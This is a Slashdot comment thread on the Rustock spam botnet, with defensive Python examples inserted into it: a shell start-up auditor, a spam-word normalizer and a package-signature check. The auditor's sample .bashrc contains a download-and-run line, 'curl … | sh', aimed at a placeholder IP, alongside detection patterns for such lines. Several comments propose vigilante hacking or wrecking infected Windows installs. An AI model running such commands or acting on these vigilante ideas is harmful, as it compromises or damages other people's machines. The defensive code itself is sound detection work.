Slashdot Mirror


Rustock Botnet Responsible For 40% of Spam

angry tapir writes "More than 40 percent of the world's spam is coming from a single network of computers that computer security experts continue to battle, according to new statistics from Symantec's MessageLabs division. The Rustock botnet has shrunk since April, when about 2.5 million computers were infected with its malicious software that sent about 43 billion spam e-mails per day. Much of it is pharmaceutical spam."

48 of 250 comments

  1. Somebody by bobstreo · · Score: 5, Insightful

    Hunt them down and kill them all
    Please

    1. Re:Somebody by DWMorse · · Score: 4, Funny

      And then, unplug their computers.

      That's... that's what you meant, right?

      --
      There's a spot in User Info for World of Warcraft account names? Really?
    2. Re:Somebody by 228e2 · · Score: 4, Informative

      No.

      I know it's "crazy" to think that not everyone knows how to run a bare bones Linux distro and knows how to block all ports except for 80, 8080, and say 21-23. But believe me when I say that the majority of computer users are incredibly inept when it comes to basic computer security.

      Grandma will never be a network admin. Neither will your local elementary school teacher. Just because people run Windows out of the box and have no idea they are harboring an orgy of botnets, is it fair to call them criminals?

      --
      Since when does being a Socialist mean 'someone who has a different opinion than me'?
    3. Re:Somebody by Anne+Thwacks · · Score: 4, Insightful
      Starting with the pharma companies whose products are being promoted, and the credit card companies who process the transactions.

      (They are the low hung fruit.)

      --
      Sent from my ASR33 using ASCII
    4. Re:Somebody by WrongSizeGlass · · Score: 2, Insightful

      So because someone is operating technology they are not able to safely use they should be free of reprimand?

      The infected systems should be blocked from internet access ... but surely you're not implying that people who aren't technical enough to be sys or network admins can't own a computer? Would I have to take a test online or at a store before ordering a computer?

      Spam causes real financial trouble and being infected either means Windows and therefore Microsoft are at fault, or the user is at fault.

      I don't see you pointing a finger at those who start this whole mess: the people writing the virus "packages" for sale, the botnet operators and those who hire them to spew spam, steal bank login information, coordinate DDoS attacks and everything in between.

      Someone has to be responsible, if you left the keys to your car in the open and someone took it for a joyride, crashing into a store front and smashing up a bunch of televisions, that's exactly the same as letting someone steal bandwidth and clock cycles for spamming people.

      In this analogy those who create and maintain the botnets & spam would be the joyriders ... and once again I don't see you putting any blame on them.

    5. Re:Somebody by drinkypoo · · Score: 2, Informative

      All the user needs to do is run Linux on a 64 bit machine so they have proper NX. I'd say OSX but it's still got fake ASLR AFAIK. Problem fucking solved. There are no known Linux-based botnets. They don't have to become a firewalling expert, because there are no dangerous services running by default. For most users Linux+Chrome or Linux+FF would provide a superior experience to what they were using before. Too bad no major vendor advertises it on this basis... or adequately

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    6. Re:Somebody by crow_t_robot · · Score: 3, Insightful

      (They are the low hung fruit.)

      Considering what they are selling, they are also the "well hung" fruit.

    7. Re:Somebody by selven · · Score: 5, Insightful

      I agree with hitting the pharma companies, but the credit card companies? I'd rather have them be neutral providers of monetary exchange services than have them decide what's legitimate and what isn't, just like ISPs should stay out of copyright enforcement.

    8. Re:Somebody by tibit · · Score: 4, Interesting

      You know what's really interesting in spam? For spam to pass the content filters, especially those based on statistical models of language, it has to have purposeful mistakes inserted all over the place. In the end, a piece of spam typically looks like if a stoned idiot wrote it. But now it seems that people who author the message in the first place became somehow infected by the stoned idiocy of their own messages.

      A few months ago I went through 300 non-scamming spam messages in my spam folder, and only managed to get to 5, I repeat, 5 payment screens. That means that most spam is pretty pointless: the websites it points to, if they haven't been left out (happens quite often), are mostly broken so that there's no way to actually pass any money to the spammer, even if you try really hard. Sometimes they superficially look like they may work, but when time comes to actually submit a payment, things are very likely to be broken. I have been testing stuff using virtual credit cards available from my bank, with very low limits -- below that of the payment amount. On a working site, you get some indication that the transaction was declined. In most places, though, there would be internal server errors, javascript errors preventing payment submittal, and all other sorts of problems.

      I think that bulk emailing operations are simply around to milk the spammers for money, and only the mailers make any money -- the spammers themselves seem too stupid to get any.

      It's quite hilarious.

      --
      A successful API design takes a mixture of software design and pedagogy.
    9. Re:Somebody by datapharmer · · Score: 2, Insightful

      There are no known Linux-based botnets

      The skill set of those running the Linux-based botnets is a little higher. It doesn't mean they aren't out there... many routers are infected and run Linux, just for an example, and there are quite a few rogue webservers out there too. The question for botnet owners really boils down to "do you want to run a 500 strong Linux server botnet or a 2.5 million strong Windows/PC botnet?" Given the number of dual and quad core systems on the consumer market I think most would agree the latter is a better ROI.

      --
      Get a web developer
    10. Re:Somebody by DrgnDancer · · Score: 2, Insightful

      In the highly unlikely event that every person in the world switched to Linux tomorrow, I guarantee there would be a Linux botnet running in a matter of weeks. Remember that you don't have to "root" a box to get it working as a part of a botnet. Running software, initiating client side network connections, sending e-mail, these are all things that can be done as a regular user. Use a Flash vulnerability, or just get the user to run a script (in some ways even easier with an unwary user in Linux, since there is no need for a telltale file extension), install botnet software in a .directory in the user's home, edit their shell start-up scripts to get it running. Presto, botnet client.

      Would it work on you? Probably not. Would it work on a normal user? Especially a normal user who just switched to a new OS and is finding that they know even less about this new system than the little they know about the old system? Absolutely. The chances of such a person even knowing to look in .bashrc for a rogue start up, or how to do an "ls -al" to find an extra hidden directory are minuscule.

      Linux is, in general, a more secure OS than Windows in many ways (not as much so as in the past, but still more secure), but a Linux box admined by a complete neophyte in a world where people were actually targeting Linux, would be just as vulnerable as a Windows box being admined by a complete neophyte in a world where people target Windows. In the end, all OSes are vulnerable to the simple fact that normal users must be allowed (at a minimum) to run their software, save their data, and use the network. Take that away, and the computer is little more than an expensive paperweight/space heater combination device. Leave it there and users will find a way to do something stupid.

      --
      I don't need a million points of light, just two points of multi-mode fiber and a 10 Gig-E router.
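The user-level persistence DrgnDancer describes (a hidden directory under $HOME plus a line in a shell start-up file) is also easy to audit for. The following is an added example, not code from the comment above or from any tool named on this page: it scans shell start-up files for the constructs such an implant needs and lists hidden entries in the home directory that are not on a known list. The sample .bashrc and the home-directory listing are constructed, the path and IP address in them are hypothetical, and the known-entries list is an assumption to be extended per system.

```python
import re
from pathlib import Path
from typing import List, Optional, Tuple

# Constructed sample of a user's ~/.bashrc after the kind of user-level infection
# described above (hypothetical path and address; not taken from any real sample).
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
nohup "$HOME/.cache-x11/svc" >/dev/null 2>&1 &
(curl -s http://198.51.100.7/u | sh) >/dev/null 2>&1
"""

# Constructed listing of the dot-entries in that home directory, i.e. what
# `ls -al ~` shows once the metadata columns are dropped.
SAMPLE_HOME_ENTRIES = [".bash_history", ".bashrc", ".cache", ".cache-x11",
                       ".config", ".profile", ".ssh"]

# Dot-entries most distributions and common programs create. Anything else is
# worth a look. Assumption: a starting point; extend it for your own systems.
KNOWN_DOT_ENTRIES = {".bash_history", ".bashrc", ".bash_logout", ".profile",
                     ".cache", ".config", ".local", ".ssh", ".gnupg",
                     ".mozilla", ".Xauthority", ".viminfo"}

# Constructs that are rarely legitimate in a shell start-up file, each paired
# with the reason reported when it matches.
SUSPICIOUS = [
    (re.compile(r"\bnohup\b"), "daemon launched from shell start-up"),
    (re.compile(r"&\s*$"), "command backgrounded at shell start-up"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"(?:\$HOME|~)/\.[A-Za-z0-9_.-]+/"), "runs something out of a hidden directory"),
    (re.compile(r"\bbase64\s+(?:-d|--decode)\b|\beval\b"), "decoded or eval'd payload"),
]

STARTUP_FILES = [".bashrc", ".bash_profile", ".profile", ".bash_login", ".zshrc"]


def audit_startup_file(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, line, reason) for every suspicious, non-comment line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(stripped):
                findings.append((number, stripped, reason))
                break  # one reason per line is enough for triage
    return findings


def unexpected_dot_entries(entries: List[str], known=KNOWN_DOT_ENTRIES) -> List[str]:
    """Hidden files/directories in a home listing that are not on the known list."""
    return sorted(e for e in entries if e.startswith(".") and e not in known)


def audit_home(home: Optional[Path] = None) -> List[str]:
    """Run both checks against a real home directory and return report lines."""
    home = home or Path.home()
    report = []
    for name in STARTUP_FILES:
        path = home / name
        if path.is_file():
            for number, line, reason in audit_startup_file(path.read_text(errors="replace")):
                report.append(f"{path}:{number}: {reason}: {line}")
    entries = [p.name for p in home.iterdir()]
    for entry in unexpected_dot_entries(entries):
        report.append(f"{home / entry}: hidden entry not on the known list")
    return report


if __name__ == "__main__":
    # The constructed data first, so the output is predictable...
    for number, line, reason in audit_startup_file(SAMPLE_BASHRC):
        print(f"sample .bashrc:{number}: {reason}: {line}")
    print("unexpected dot-entries:", unexpected_dot_entries(SAMPLE_HOME_ENTRIES))
    # ...then the real home directory of whoever runs this.
    for line in audit_home():
        print(line)
```

Run with no arguments it reports on the constructed sample first and then on the real home directory of the user running it. The pattern list is deliberately narrow; a baseline taken at install time (hashes of the start-up files) catches edits that match no pattern at all.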
    11. Re:Somebody by Lurker2288 · · Score: 3, Insightful

      Yeah, go after Pfizer. Because I'm sure it's really them that's putting out all that Viagra spam, and totally not bullshit suppliers of counterfeit drugs.

      Seriously, do you have any idea how tightly regulated even direct to consumer drug ads are? There's no way any legitimate company is involved in this. I know it's fun and exciting to blame Big Pharma for everything wrong in life, but how about we stick to the many things they ACTUALLY do wrong, rather than random shit we merely attribute to them?

  2. Pharmaceutical by Tubal-Cain · · Score: 3, Insightful

    Much of it is pharmaceutical spam.

    A very particular kind of pharmaceutical.

    1. Re:Pharmaceutical by compro01 · · Score: 5, Informative

      My accounts have been getting more offers of narcotics than genital enlargement in the past few months. Also got a few spams selling antibiotics, which is a new one, and even more reprehensible if they're genuine.

      --
      upon the advice of my lawyer, i have no sig at this time
    2. Re:Pharmaceutical by dgatwood · · Score: 2, Informative

      Why is it worse if they're real? You can buy antibiotics at any vet supply house.... It's not like they're hard to get without a prescription. If they're real, the spam is pretty much noise. If they're not real, then it's bad---people buying something that they think will make them well, only to have it not help them, or worse, poison them....

      --
      Check out my sci-fi/humor trilogy at PatriotsBooks.

    3. Re:Pharmaceutical by compro01 · · Score: 4, Insightful

      The spam is offering antibiotics such as linezolid, teicoplanin, daptomycin, and tigecycline, antibiotics that are reserved for highly resistant bacteria ("superbugs" like VRE and MRSA), not the stuff you can get from a veterinarian. These drugs being used inappropriately is a very bad thing.

      --
      upon the advice of my lawyer, i have no sig at this time
  3. Voluptuous woman falls over heavy chest by Spewns · · Score: 5, Funny

    Make your girl happy with your long and huge meat machine.

    *link to .ru website*

    1. Re:Voluptuous woman falls over heavy chest by Delarth799 · · Score: 2, Funny

      You get text in your emails still?

      A vast majority of the ones I get are just a link or someone having a spaz on the keyboard a few times and then a link.
      I do occasionally get ones where they try to chop up the words into several parts. Those are the easy ones to filter for.
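tibit's observation above, that spam deliberately mangles its words to get past content filters, and Delarth799's that chopped-up words are the easy ones to filter for, come down to the same step: undo the obfuscation before scoring. The following is an added example, not code from either comment or from any filter named on this page. It is a small normalizer that joins letter-by-letter spellings, maps look-alike digits and symbols back to letters, collapses stretched letters and re-joins chopped fragments, placed in front of a constructed term list; the messages and the term list are constructed, and the term list stands in for whatever rule set or statistical model the real filter scores with.

```python
import re
from typing import List, Set

# Separators spammers insert between letters: "v.i.a.g.r.a", "v-i-a-g-r-a", "v i a g r a".
_SEP = r"[.\-*_ ]"
_SPACED = re.compile(rf"\b(?:\w{_SEP}){{2,}}\w\b")
# Look-alike digits and symbols substituted for letters: "d1sc0unt", "pr1ce$".
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                       "7": "t", "@": "a", "$": "s"})
# Letters stretched to dodge exact matches: "cheeeap", "viiiiagra".
_REPEAT = re.compile(r"([a-z])\1{2,}")
_WORD = re.compile(r"[a-z]{2,}")

# A constructed term list; a real filter carries thousands of weighted rules.
SPAM_TERMS = {"viagra", "cialis", "pharmacy", "discount", "prices", "enlargement"}


def normalize(text: str) -> List[str]:
    """Undo the common obfuscations, then tokenize."""
    t = text.lower()
    t = _SPACED.sub(lambda m: re.sub(_SEP, "", m.group(0)), t)  # v.i.a.g.r.a -> viagra
    t = t.translate(_LEET)                                        # d1sc0unt -> discount
    t = _REPEAT.sub(r"\1", t)                                     # cheeeap -> cheap
    tokens = _WORD.findall(t)
    # Chopped words ("vi agra") arrive as pairs of short fragments: also emit the
    # joined form of each adjacent short pair so it can match a term.
    joined = [a + b for a, b in zip(tokens, tokens[1:]) if len(a) <= 4 and len(b) <= 4]
    return tokens + joined


def spam_hits(text: str, terms: Set[str] = SPAM_TERMS, normalise: bool = True) -> Set[str]:
    """Spam terms found in the message, with or without the de-obfuscation step."""
    tokens = normalize(text) if normalise else _WORD.findall(text.lower())
    return terms & set(tokens)


def classify(text: str, threshold: int = 2) -> bool:
    """True if at least `threshold` distinct spam terms appear after normalization."""
    return len(spam_hits(text)) >= threshold


if __name__ == "__main__":
    # Constructed messages in the style of the thread, not real spam samples.
    for msg in ["V.i.a.g.r.a at d1sc0unt pr1ces",
                "Vi agra and ci alis, cheeeap!",
                "Meet me at the pharmacy on Main St."]:
        print(f"{msg!r}: raw={sorted(spam_hits(msg, normalise=False))} "
              f"normalized={sorted(spam_hits(msg))} spam={classify(msg)}")
```

The third message shows why a single term is not enough: "pharmacy" alone is ordinary English, so the classifier wants two distinct hits. The same normalizer can feed a Bayesian scorer instead of a term list; the point is that it runs before the statistics, so the deliberate misspellings stop being a different vocabulary.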

    2. Re:Voluptuous woman falls over heavy chest by Nadaka · · Score: 2, Funny

      I know, I kinda miss the days when my spam folder would be filled with messages that end in a quixotic paragraph that resembles nonsensical poetry.

  4. Oh PAH-LEEEZE by Frosty+Piss · · Score: 5, Insightful

    First and foremost, don't expect ANY help from the "security" companies like Symantec and the like, SOLVING this problem would mean the end to their extortion business.

    And, don't expect ANY help from the "white hats" in general, all they can do is walk in circles pontificating about how it would be unethical to hack these networks and bring them down.

    So really, the only solution is the possibility of someone with "black hat" skilz that wants to be paid to take the system down outside the "law".

    --
    If you want news from today, you have to come back tomorrow.
    1. Re:Oh PAH-LEEEZE by Nemyst · · Score: 4, Interesting

      Your wording seems to indicate contempt. White hats or security experts unfortunately have their hands tied. They probably know how to take down the botnet, but that involves illegal activity. While the criminals are hampered by no such things, the lawful guys are stuck with it: anything they'd do that would be essentially good would get them jailed.

    2. Re:Oh PAH-LEEEZE by Yvan256 · · Score: 5, Interesting

      So, Lone Star, now you see that evil will always triumph because good is dumb. - Dark Helmet

    3. Re:Oh PAH-LEEEZE by PatPending · · Score: 5, Funny

      So really, the only solution is the possibility of someone with "black hat" skilz that wants to be paid to take the system down outside the "law".

      Hudson: Let's just bug out and call it even, OK? What are we talking about this for?

      Ripley: I say we take off and nuke the entire site from orbit. It's the only way to be sure.

      Hudson: Fuckin' A...

      --
      What one fool can do, another can. (Ancient Simian Proverb)
    4. Re:Oh PAH-LEEEZE by Anonymous Coward · · Score: 2, Insightful

      Still, it's true if you think about it.

      Imagine if nearly 90% of cars and trucks on the road dumped trash all over the place when driving around? Those drivers would get a ticket and be required to go to a garage to fix whatever the hell is causing their vehicle to dump trash everywhere.

      No such law exists for computers and the internet. And everyone has to suffer because of it.

      So, good is dumb because your hands are tied in laws. And evil triumphs because we get billions of spam clogging the tubes all over the place.

    5. Re:Oh PAH-LEEEZE by silentcoder · · Score: 2, Interesting

      That is only partially true. There was a /. story not long ago about a white-hat company that utterly destroyed a botnet. Sorry I can't remember the names, which is making googling rather hard.
      I do remember the technical details (who's surprised?). It was a difficult and involved process - the botnet relied on numerous DNS tricks to always be able to find its control servers. What the white hats did was to trace and track the current set of master servers. Knocking them out wouldn't do any good, as the controllers would just activate a new set and the bots would find them.

      Instead they tracked the servers, worked with law enforcement and the ISPs hosting them and got those DNS names rerouted to their own servers - which were running a control server of their own, designed to be a drop-in compatible replacement for the real thing. Result - suddenly the good guys controlled all the bots, and could then actively locate and eradicate the infections (including letters to the owners of the computers and such).

      It meant a lot of coordination between many organisations because pulling it off meant a huge bunch of people doing slightly different updates to servers at the exact same time - but it was done, and it shows it CAN be done.

      Interestingly I do remember that the company that did it are the new kids in security, a small startup. They don't have any share of the pie that Symantec and the like have, so they have no vested interest in keeping botnets alive. Instead they are trying to build a business model on studying, and then actively destroying, them.

      Trouble is - botnets are like hydras: as long as there are so many vulnerable machines on the net (e.g. the entire Microsoft Windows customer base) destroying one doesn't do any good - you see a drop in spam for a few days, maybe a week or two, then another botnet has filled in the gap.

      The only real way to solve the problem is to remove those deliciously easy targets. We all know exactly how easy that will be.

      --
      Unicode killed the ASCII-art *
    6. Re:Oh PAH-LEEEZE by Raenex · · Score: 2, Informative

      There was a /. story not long ago about a white-hat company that utterly destroyed a botnet.

      If you're thinking of this story, it was a research professor, and the botnet was eventually allowed to be retaken.

    7. Re:Oh PAH-LEEEZE by Elektroschock · · Score: 2, Insightful

      It is no problem for Government agencies to take extralegal action.

      But indeed the core is that people should use Linux and users of infected Windows machines should pay.

  5. So how hard.... by Anonymous Coward · · Score: 3, Insightful

    Is it to order some of their crap? Track down where the money goes.

    And kill them.

    We've spent more doing less millions of times... Why don't we get around to fixing this problem?

    1. Re:So how hard.... by ergrthjuyt · · Score: 2, Informative

      Generally spammers are contracted out or just trying to earn referral commissions - they aren't doing the selling themselves. Also, the money will go international, often to countries that aren't just going to say "OK, here it is" when you ask for the bank info.

  6. anti-spam by bakamorgan · · Score: 4, Funny

    Find their IP address and sic 4chan on them, maybe then something will get done.

    1. Re:anti-spam by NevarMore · · Score: 2, Funny

      Wait, are you proposing that we ENCOURAGE 4chan to take over a botnet of 2.5 million computers?

      I'll take the spam thankyouverymuch.

  7. Really? by scdeimos · · Score: 5, Funny

    More than 40 percent of the world's spam is coming from a single network of computers

    Yes, it's called the internet.

  8. Re:Windows has great anti-malware tech by robot256 · · Score: 3, Insightful

    This is like the corporate/university computers that re-image themselves every night against the central server, deleting anything that changed on the hard disk. That would be an awesome feature for a dumb web-surfing box for the idio---parents. Would be a little bit of a pain for everyone else, but we can avoid getting infected, right?

  9. Re:Question by ScentCone · · Score: 4, Interesting

    it would seem to me that the pharmaceutical companies that benefit from this ... should have responsibility in the computer crimes taking place here

    The overwhelming majority of the "pharmaceutical" ads in question are fraudulent. They're not actually selling Viagra. They're either selling knockoff placebos, or they're selling nothing at all, because they're just looking for naive suckers to visit a sketchy web site and cough up a credit card number or other details that can be used in identity theft schemes or similar crimes. Merck and the other actual makers of the real products would love nothing more than to shut this crap down.

    --
    Don't disappoint your bird dog. Go to the range.
  10. Friendly Reminder by DynaSoar · · Score: 5, Insightful

    "Maybe what we need are a few good old fashioned hangings." -- Commissioner Orson Swindell, Federal Trade Commission
      at the first FTC spam conference.

    --
    "I may be synthetic, but I'm not stupid." -- Bishop 341-B
  11. Stiffy In A Jiffy by soundguy · · Score: 5, Funny
    The best one I ever received was

    Subject: Stiffy In A Jiffy
    From: Erection Perfection

    --
    Nothing worthwhile ever happens before noon
  12. Re:Wunna These Days, Alice... by dgatwood · · Score: 3, Interesting

    No need to destroy their data. All one would have to do is replace key Windows boot files with a script that tells them that their Windows installation is hopelessly infected by viruses and has been disabled, telling them to take it to somebody who actually knows how to properly configure a Windows machine. There's no need to destroy irreplaceable data, merely to wreck Windows so badly that they have to do a full reinstall. Since that is completely beyond any of the sorts of people who are part of the problem, they would be forced to take their computers to somebody for repair, and one would at least hope that a sizable percentage of those machines would come back properly protected from viruses.

    --
    Check out my sci-fi/humor trilogy at PatriotsBooks.

  13. Re:Windows has great anti-malware tech by blueg3 · · Score: 2, Insightful

    You can fairly easily set it up so that when machines reboot, all changes are lost. It's convenient for a lot of applications.

  14. Email spam is so passe. by Psaakyrn · · Score: 2, Interesting

    Now the port scan spams on the other hand.. Sure, I can block them, but the sheer load is causing DoS issues. What can I do about that?

  15. You forgot your tinfoil hat. by N0Man74 · · Score: 3, Informative

    Companies like Symantec and Norton didn't start off as antivirus companies. They built tools and utilities. If by some miracle all of the botnets, trojans, and virus infections were to vanish from the world, I imagine that they would go back to making tools. It was virus makers that created the market, not Symantec and Norton.

    I suppose you think cancer researchers don't really want to find a cure, because then they'd lose their funding, right?

    The fact that you are marked as insightful is baffling. You have a distorted sense of reality.

    I won't even bother commenting on your "white hats" criticisms, since that's been pretty well covered by others...

    However, to say that *your* solution is the only solution is not only short-sighted, it's arrogant. Black Hat "skilz" must be the mystery reason why about half the number of systems are infected now, right?

    There isn't a magic bullet solution that will magically fix the problem completely, aside from getting rid of the internet (and maybe humanity too!). It has to be fought on multiple fronts and incorporating multiple solutions to mitigate the problem and hopefully if it's made difficult enough or they have enough that they can lose, then maybe it will stop... but it's much more likely that we're always going to be stuck with it to at least some degree.

  16. Re:Question by sjames · · Score: 3, Insightful

    If the FBI was half as interested in nailing fraud as it was in doing the RIAA's bidding, they would create fake credit card accounts and order the spamvertized products themselves. Then they can trace the transactions back and get the merchant accounts frozen.

  17. Re:This is why we won't shut up. by grcumb · · Score: 2, Insightful

    "Us Ubuntu and Mac users will not give you peace nor rest until Windows is dead"

    Good luck with that. Of course once OUR Windows is dead it'll be YOUR machines sending us SPAM.

    Yeah, you know what? You may be right, but in the mean time...

    ... Could you please stop making excuses and fix your fucking machines that spam the rest of the world!?!

    Because, you see, whatever MY potential for causing YOU harm in the future (and I admit it's non-zero), the likelihood that the overwhelming majority of the millions of machines in this botnet right now are running Windows has a probability of 1. So maybe if WE stopped speculating about some future email Armageddon and focused on the one that's happening right now, we might actually get something done.

    And who knows? Maybe the lessons you learn by cleaning up this mess will help us all avoid it in the future? Now wouldn't that be nice?

    Nicer than your reply, anyway, which is the rhetorical equivalent of 'Yo' Momma!'

    --
    Crumb's Corollary: Never bring a knife to a bun fight.
  18. Re:This is why we won't shut up. by silentcoder · · Score: 4, Insightful

    >Good luck with that. Of course once OUR Windows is dead it'll be YOUR machines sending us SPAM.

    No it won't. The "windows gets targeted only because it's biggest" argument is a fallacy - and an easily debunked one at that.

    Here's the REAL reason why you will never see much spam or trojans in the Linux world. Unlike our Windows counterparts, when we need an app for some task, we don't open an (insecure) browser, search around, find a .exe which we then RUN to install the program.

    We connect to a repository, which is run by software experts who have repackaged and tested the programs in question; the software gets downloaded automatically, the files are checked using digital signatures to prevent MitM attacks, and only then installed.

    Average computer users will never have the capacity of computer experts to tell trojans from useful apps, and either way have no viable means of determining if a particular install file is trustworthy without having already taken the risk, all while dealing with a browser/email combination that could do all this without them even being aware of it (though at least that has gotten better than it used to be - remember I-Love-You? That's how bad Outlook once was!).

    We GNU/Linux users pool our resources to have people who are skilled select and evaluate the apps in our repositories, and make our selection from a set that's pre-vetted. We can choose on features and design without having to WORRY about "does it coincidentally install spyware which will later be installing a botnet", because the people who packaged the software have nothing to gain by not removing such, and everything to gain from ensuring the trustworthiness of the software.

    Remove the capacity to write "installer programs" for Windows - create a repository (perhaps even a paid one, like Apple's App Store) and you solve the botnet problem. Trouble is, Microsoft, unlike the GNU/Linux companies, won't find the best way to keep their repo profitable is to be open to all comers who write useful software. Much like Apple, they'll end up using it to make sure nothing is available to their users that competes with their own products.

    The cure may be even worse than the disease - so I don't know if it's something to push for. What I can tell you is, as long as ordinary users are supposed to vet good from bad software (people who have ZERO training in how to tell the difference, in other words) - botnets WILL proliferate. The problem isn't even so much OS design (though it plays a role), it's the way software is managed on the two platforms.

    GNU/Linux simply has a software management concept that is by its very nature far, far more secure than Windows. It's not perfect - last year Fedora's repos were pwned temporarily, and they had to create and issue a full set of new keys to ensure the integrity of what they contained - but the problem was fixable without any customer ever being at risk. That's what GNU/Linux's repository concept does - it takes the task of risk assessment and gives it to people who are trained for the job, so by definition they do it better.

    --
    Unicode killed the ASCII-art *
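The verification flow silentcoder describes (metadata signed by the repository, each package checked against that metadata before it is installed) fits in a few lines. The following is an added example, not apt's, rpm's or any distribution's code; the archive names, contents and key are constructed. Assumption: an HMAC under a shared key stands in for the repository's asymmetric (OpenPGP) signature so that the example runs on the standard library alone; in a real repository the client holds only the public key and cannot produce signatures. The cases it refuses are the ones the comment is about: an archive swapped in transit, a hash list rewritten by an attacker who cannot sign it, and, mirroring the Fedora re-keying, metadata signed under a key the client no longer trusts.

```python
import hashlib
import hmac
import json
from typing import Dict

# Constructed repository: two fake archives and a signing key. The key is a
# stand-in for the repository's private OpenPGP key (assumption, see lead-in).
REPO_SIGNING_KEY = b"constructed-signing-key-not-a-real-one"

PACKAGES: Dict[str, bytes] = {
    "example-app_1.0_amd64.deb": b"constructed archive contents for example-app",
    "example-lib_2.3_amd64.deb": b"constructed archive contents for example-lib",
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sign_manifest(packages: Dict[str, bytes], key: bytes = REPO_SIGNING_KEY) -> Dict[str, str]:
    """Repository side: publish the hash of every archive plus a signature over that list."""
    body = json.dumps({name: sha256(data) for name, data in packages.items()}, sort_keys=True)
    signature = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return {"body": body, "signature": signature}


def forge_manifest(manifest: Dict[str, str], name: str, archive: bytes) -> Dict[str, str]:
    """Attacker side: point the hash list at a replacement archive, keeping the old signature
    because the attacker has no way to produce a new one."""
    hashes = json.loads(manifest["body"])
    hashes[name] = sha256(archive)
    return {"body": json.dumps(hashes, sort_keys=True), "signature": manifest["signature"]}


class VerificationError(Exception):
    pass


def verify_and_install(name: str, archive: bytes, manifest: Dict[str, str],
                       key: bytes = REPO_SIGNING_KEY) -> str:
    """Client side. Order matters: signature first, then the hash, only then unpack."""
    expected = hmac.new(key, manifest["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["signature"]):
        raise VerificationError("manifest signature invalid; none of its hashes can be trusted")
    hashes = json.loads(manifest["body"])
    if name not in hashes:
        raise VerificationError(f"{name} is not listed in the signed manifest")
    if not hmac.compare_digest(hashes[name], sha256(archive)):
        raise VerificationError(f"{name}: archive does not match its signed hash")
    return hashes[name]  # stand-in for "unpack and install": the verified hash


def rejected(name: str, archive: bytes, manifest: Dict[str, str],
             key: bytes = REPO_SIGNING_KEY) -> bool:
    """True if the client refuses to install this archive under this manifest."""
    try:
        verify_and_install(name, archive, manifest, key)
    except VerificationError as err:
        print("refused:", err)
        return True
    return False


if __name__ == "__main__":
    manifest = sign_manifest(PACKAGES)
    name = "example-app_1.0_amd64.deb"
    genuine = PACKAGES[name]
    trojaned = b"constructed archive with an extra bot inside"
    print("genuine archive installed:", not rejected(name, genuine, manifest))
    # A man-in-the-middle swaps the archive but cannot touch the signed hash list.
    print("swapped archive rejected:", rejected(name, trojaned, manifest))
    # They rewrite the hash list too, but cannot sign it without the repository key.
    print("forged manifest rejected:", rejected(name, trojaned, forge_manifest(manifest, name, trojaned)))
    # The repository re-keys; clients now trust only the new key, so old metadata fails.
    print("old-key manifest rejected after rotation:",
          rejected(name, genuine, manifest, key=b"constructed-rotated-key"))
```

The order of the checks is the substance: verifying the signature over the whole hash list first means a single trusted key vouches for every archive, and a hash mismatch on one archive cannot be "fixed" by editing the metadata. Re-keying after a compromise, as in the Fedora case, works for the same reason: clients drop the old key, and everything signed under it, at once.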
  19. Re:Question by ZERO1ZERO · · Score: 3, Funny
    Tom: Listen to this one: you open a company called the "Arse Tickler's Faggots Fan Club".

    Soap: You what?

    Tom: You take out an advert in the back page of some gay mag, advertising the latest in arse-intruding dildos. You sell it with, I dunno, "does what no other dildo can do until now", "the latest and greatest in sexual technology", "guaranteed results or your money back", all that bollocks. Now these dils cost twenty-five quid a pop - that's a snip for the amount of pleasure they're gonna give the recipients. But they send their cheques to the other company name, nothing offensive, er, "Bobbie's Bits" or something, for twenty-five quid. You take that twenty-five quid, you stick it in the bank until it clears. Now, this is the smart bit - you send back the cheque for twenty-five pound from the other company name, "Arse Tickler's Faggots Fan Club", saying we're sorry, we couldn't get the supplies from America because they ran out of stock. Now you see how many people cash that cheque - not a single soul, because who wants their bank manager to know they tickle arse when they're not paying cheques?

    Bacon: So how long do you have to wait until you see a return?

    Tom: Probably no more than four weeks.

    Bacon: A month? So, what fucking good is that if we need it in six - no, five days?

    Tom: Well, it's still a good idea.

  20. Rooting out cross-border networks of perpetrators? by D4C5CE · · Score: 3, Interesting

    Our taxes pay agencies boasting their purported capability to do just that. If they let bot-herders proliferate for years, how are they supposed to be more efficient against terrorists not entirely dissimilar in organization (and with the former able to turn into the latter at any time by using/"renting out" their botnets as Weapons of Mass Disruption, e.g. for DDoS attacks against critical infrastructures)?

  21. 2.5 million Windows computers by devent · · Score: 2, Informative
    It's 2.5 million Windows computers that are infected. No Macs, no Linux, no *BSD, no Solaris, no YouNameIt. It would be interesting how many are Windows XP, Windows Vista or Windows 7.

    Hm, let's see, 2.5 million Windows computers in one botnet against 0 Linux computers worldwide. I would say Dell was right:

    "6) Ubuntu is safer than Microsoft Windows: The vast majority of viruses and spyware written by hackers are not designed to target and attack Linux." from http://www.theregister.co.uk/2010/06/14/dell_ubuntu_windows_security/

    --
    http://www.mueller-public.de - My site http://www.anr-institute.com/ - Advanced Natural Research Institute
  22. Microsoft malicious software removal tool by Joce640k · · Score: 2, Interesting

    Why isn't the Microsoft malicious software removal thing wiping these botnets out in their millions?

    --
    No sig today...
  23. Re:Wunna These Days, Alice... by dgatwood · · Score: 2, Insightful

    Because statistically speaking, if they have one virus, they probably have thirty.

    --
    Check out my sci-fi/humor trilogy at PatriotsBooks.